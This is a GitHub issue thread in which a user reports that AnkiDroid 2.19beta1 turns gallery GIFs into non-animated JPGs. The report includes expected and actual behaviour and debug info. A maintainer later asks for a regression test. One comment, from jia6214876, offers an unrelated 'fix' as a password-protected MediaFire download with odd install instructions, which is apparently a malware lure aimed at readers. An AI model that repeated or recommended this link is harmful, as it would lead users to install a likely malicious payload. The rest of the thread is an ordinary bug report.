### ISSUE TITLE
[BUG]: Can't add GIF image

### ISSUE THREAD

**Issue by snowtimeglass** [ankidroid/Anki-Android#16967]
### Checked for duplicates?

- [X] This issue is not a duplicate

### Does it also happen in the desktop version?

- [X] This bug does not occur in the latest version of Anki

### What are the steps to reproduce this bug?

Add a GIF image from Gallery into a field of a note 

[sample]
<img src="https://github.com/user-attachments/assets/28ed3313-de0e-4efa-9080-8cfb177215b0" width="320px">

https://images.app.goo.gl/9fnFVBRWEzp9cHZt8

### Expected behaviour

As the followings in 2.18.4:

- The original GIF file name (e.g. `sample.gif`) (with the tags) is added into the field
　![image](https://github.com/user-attachments/assets/6e70e179-6362-4e41-9a53-67d28b39a6c6)

- the GIF animation works in Previewer

   https://github.com/user-attachments/assets/e5b497bd-3c1b-4ee6-93cf-30a878abaa90

- After the note is added, the GIF animation works in Reviewer

### Actual behaviour

- The original GIF file name is not added into the field. Instead,  another filename with jpg extension  is added.
   ![image](https://github.com/user-attachments/assets/db6df369-9034-4d2c-a315-7c14480a897e)

 
- the (original) GIF animation doesn't work in Previewer (and in "Add image" screen, either)
   
  https://github.com/user-attachments/assets/4d67abc1-0860-4a8d-9996-059b528ccc86

- After the note is added, the GIF animation doesn't works in Reviewer (both in the existing reviewer and in the new reviewer).

### Debug info

```text
AnkiDroid Version = 2.19beta1 (6630ff411d643bf03206e106c4d940dc7076e738)

Backend Version = 0.1.40-anki24.06.3 (24.06.3 d678e39350a2d243242a69f4e22f5192b04398f2)

Android Version = 11 (SDK 30)

ProductFlavor = full

Manufacturer = OPPO

Model = CPH2013

Hardware = qcom

Webview User Agent = Mozilla/5.0 (Linux; Android 11; CPH2013 Build/RKQ1.200903.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36

ACRA UUID = 5e59349c-ede4-4942-91b7-199dcf1342c0

FSRS Enabled = true

Crash Reports Enabled = true
```

### Research

- [X] I am reporting a bug specific to AnkiDroid (Android app)
- [X] I have checked the [manual](https://ankidroid.org/docs/manual.html) and the [FAQ](https://github.com/ankidroid/Anki-Android/wiki/FAQ) and could not find a solution to my issue
- [X] (Optional) I have confirmed the issue is not resolved in the latest alpha release ([instructions](https://docs.ankidroid.org/manual.html#betaTesting))

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by david-allison** [comment]
@criticalAY 

A regression test along with the fix would be great
